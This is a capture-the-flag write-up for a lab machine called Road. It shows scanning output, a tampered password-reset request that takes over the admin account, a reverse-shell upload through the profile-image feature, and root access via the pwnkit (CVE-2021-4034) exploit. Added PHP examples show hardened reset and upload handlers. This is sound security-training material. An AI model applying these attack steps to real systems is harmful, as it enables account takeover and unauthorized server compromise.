CTF : Road
Information
- IP: 10.10.112.242
- MYIP: 10.9.85.5
First enumeration
Basics
- NMAP
```console
$ sudo nmap -p22,80 -A 10.10.112.242
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-07 21:32 CEST
Nmap scan report for 10.10.112.242
Host is up (0.036s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e6:dc:88:69:de:a1:73:8e:84:5b:a1:3e:27:9f:07:24 (RSA)
|   256 6b:ea:18:5d:8d:c7:9e:9a:01:2c:dd:50:c5:f8:c8:05 (ECDSA)
|_  256 ef:06:d7:e4:b1:65:15:6e:94:62:cc:dd:f0:8a:1a:24 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Sky Couriers
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   36.49 ms 10.9.0.1
2   36.50 ms 10.10.112.242

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.09 seconds
```
```console
$ gobuster dir -f -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.112.242/v2/ -x cgi,html,txt,js,php,php.bak,bak,zip,sql,sql.bak,tgz,tar.gz,bkp,tar,rar,id_rsa,log,xml,json,sh,py,pl,rb,csv,pub,jar
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.112.242/v2/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              zip,sql.bak,tgz,log,py,pub,php.bak,bak,tar.gz,tar,id_rsa,sh,pl,rb,cgi,jar,js,php,sql,bkp,rar,xml,csv,html,json,txt
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2022/07/07 22:13:32 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 2619]
/profile.php          (Status: 200) [Size: 2619]
/admin/               (Status: 200) [Size: 32]
/lostpassword.php     (Status: 200) [Size: 22]
```
```console
$ gobuster dir -f -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.112.242/v2/admin/ -x cgi,html,txt,js,php,php.bak,bak,zip,sql,sql.bak,tgz,tar.gz,bkp,tar,rar,id_rsa,log,xml,json,sh,py,pl,rb,csv,pub,jar
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.112.242/v2/admin/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,php.bak,sql.bak,bkp,pub,txt,bak,zip,tgz,tar,pl,rb,js,sql,tar.gz,rar,id_rsa,log,csv,jar,cgi,php,xml,json,sh,py
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2022/07/07 22:26:55 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 32]
/login.html           (Status: 200) [Size: 2619]
/register.html        (Status: 200) [Size: 3798]
/reg.php              (Status: 200) [Size: 28]
/logout.php           (Status: 200) [Size: 2619]
Progress: 191484 / 5955147 (3.22%)
^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/07/07 22:39:45 Finished
===============================================================
```
Vulnerabilities search
```console
$ nikto -host 10.10.112.242
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.112.242
+ Target Hostname:    10.10.112.242
+ Target Port:        80
+ Start Time:         2022-07-07 22:02:21 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 4c97, size: 5ce886fbdbcdf, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ /phpMyAdmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpMyAdmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7892 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2022-07-07 22:08:40 (GMT2) (379 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

*********************************************************************
Portions of the server's headers (Apache/2.4.41) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)? n
```
Exploit
First I tried to log in to the web interface:
http://10.10.112.242/v2/admin/login.html
But I didn't know any user... Thankfully we can create a new one via the register button.
Then I entered the newly created creds and signed in.
Now there are two pages that should be interesting:
- The edit profile page
http://10.10.112.242/v2/profile.php
On this page we learn that only the admin can change profile options, and it lets us know the admin login: admin@sky.thm
- The reset user page
http://10.10.112.242/v2/ResetUser.php
It lets us change the current user's password, but if we intercept the request with Burp we can change the username ;)
```http
POST /v2/lostpassword.php HTTP/1.1
Host: 10.10.112.242
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: fr,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18730205262181738328290571262
Content-Length: 644
Origin: http://10.10.112.242
Connection: close
Referer: http://10.10.112.242/v2/ResetUser.php
Cookie: PHPSESSID=9re8h3a99ke3afk90g6q9ma4vg; Bookings=0; Manifest=0; Pickup=0; Delivered=0; Delay=0; CODINR=0; POD=0; cu=0
Upgrade-Insecure-Requests: 1

-----------------------------18730205262181738328290571262
Content-Disposition: form-data; name="uname"

admin@sky.thm
-----------------------------18730205262181738328290571262
Content-Disposition: form-data; name="npass"

toto
-----------------------------18730205262181738328290571262
Content-Disposition: form-data; name="cpass"

toto
-----------------------------18730205262181738328290571262
Content-Disposition: form-data; name="ci_csrf_token"

-----------------------------18730205262181738328290571262
Content-Disposition: form-data; name="send"

Submit
-----------------------------18730205262181738328290571262--
```
And now we got the admin creds :)
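The bug behind that request, as an added example written for this writeup (it is not the box's real lostpassword.php): the handler trusts the posted "uname" field, and the empty ci_csrf_token goes unchecked. The users(email, password_hash) table and the $pdo connection are assumptions.

```php
<?php
// Added example (not the Road box's own lostpassword.php): the pattern the
// writeup abuses, beside a hardened handler. Assumed schema: users(email,
// password_hash); $pdo is an existing PDO connection (assumption).
session_start();

// VULNERABLE: the account to update is taken from the form field "uname",
// so a logged-in user can post admin@sky.thm instead of their own address.
function reset_password_vulnerable(PDO $pdo): void
{
    $stmt = $pdo->prepare('UPDATE users SET password_hash = ? WHERE email = ?');
    $stmt->execute([password_hash($_POST['npass'], PASSWORD_DEFAULT), $_POST['uname']]);
}

// HARDENED: the account comes from the server-side session only, the CSRF
// token is really checked (the captured request sent it empty and was still
// accepted), and the two password fields must match.
function reset_password_hardened(PDO $pdo): void
{
    if (empty($_SESSION['uname'])) {
        http_response_code(401);
        exit('not logged in');
    }
    $token = $_POST['ci_csrf_token'] ?? '';
    if ($token === '' || !hash_equals($_SESSION['csrf_token'] ?? '', $token)) {
        http_response_code(403);
        exit('bad csrf token');
    }
    $new = $_POST['npass'] ?? '';
    if ($new === '' || strlen($new) < 12 || $new !== ($_POST['cpass'] ?? '')) {
        http_response_code(400);
        exit('passwords empty, too short or not matching');
    }
    $stmt = $pdo->prepare('UPDATE users SET password_hash = ? WHERE email = ?');
    $stmt->execute([password_hash($new, PASSWORD_DEFAULT), $_SESSION['uname']]);
    session_regenerate_id(true); // drop the old session id after the change
}
```

An admin-only "reset another user" feature, if the app needs one, belongs in a separate handler that first checks the session's role, never in a field the browser fills in.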
Now I can use the profile image upload to upload a reverse shell.
In the page source code there is a clue:
```html
<!-- /v2/profileimages/ -->
```
Launch a pwncat listener and then:
```console
$ curl http://10.10.112.242/v2/profileimages/shell.php
```
And we got shell :)
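What the upload handler should have done, as an added example (not the box's own code): the profile image is validated by its bytes, re-encoded, given a server-chosen name, and stored outside the web root, so a shell.php never lands in /v2/profileimages/. The "avatar" field name and $storeDir are assumptions.

```php
<?php
// Added example, not the box's own upload code. Hardened handling for the
// profile-image upload the writeup abuses. Assumes the form field is named
// "avatar" (assumption) and $storeDir is a directory outside the web root.
function store_profile_image(array $file, string $storeDir): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || $file['size'] > 2 * 1024 * 1024) {
        throw new RuntimeException('upload failed or too large');
    }
    // Decide the type from the bytes, never from the client-supplied filename
    // or Content-Type: a PHP script renamed to shell.png still fails here.
    $allowed = [IMAGETYPE_PNG => 'png', IMAGETYPE_JPEG => 'jpg', IMAGETYPE_GIF => 'gif'];
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || !isset($allowed[$info[2]])) {
        throw new RuntimeException('not an accepted image');
    }
    // Re-encode through GD so PHP appended to a real image is thrown away.
    $img = @imagecreatefromstring((string) file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('image could not be decoded');
    }
    // Server-chosen name and extension; the original filename is never used.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$info[2]];
    $dest = rtrim($storeDir, '/') . '/' . $name;
    $ok = match ($info[2]) {
        IMAGETYPE_PNG  => imagepng($img, $dest),
        IMAGETYPE_JPEG => imagejpeg($img, $dest, 85),
        IMAGETYPE_GIF  => imagegif($img, $dest),
    };
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('could not write image');
    }
    return $name; // serve it through a read-only handler, not by URL under /v2/
}

// Usage (assumed field name): $name = store_profile_image($_FILES['avatar'], '/var/lib/skycouriers/avatars');
```

For a directory that must keep serving old images from under the web root, an Apache `php_admin_flag engine off` in that directory's `<Directory>` block stops mod_php from executing anything dropped there.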
```console
$ cd /home/webdeveloper
$ cat user.txt
```
Privilege escalation
Enumeration for privesc
```console
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 20.04.2 LTS
Release:        20.04
Codename:       focal
$ uname -a
Linux sky 5.4.0-73-generic #82-Ubuntu SMP Wed Apr 14 17:39:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
```
```console
$ find / -user root -perm -4000 2>/dev/null
[...]
/usr/bin/pkexec
[...]
```
As pkexec is SUID root and this is an old enough OS (Ubuntu 20.04.2, kernel built April 2021), we can try pwnkit (CVE-2021-4034).
Using pwncat I uploaded the python exploit for pwnkit.
Exploit
```console
$ python3 CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# cat /root/root.txt
```
\o/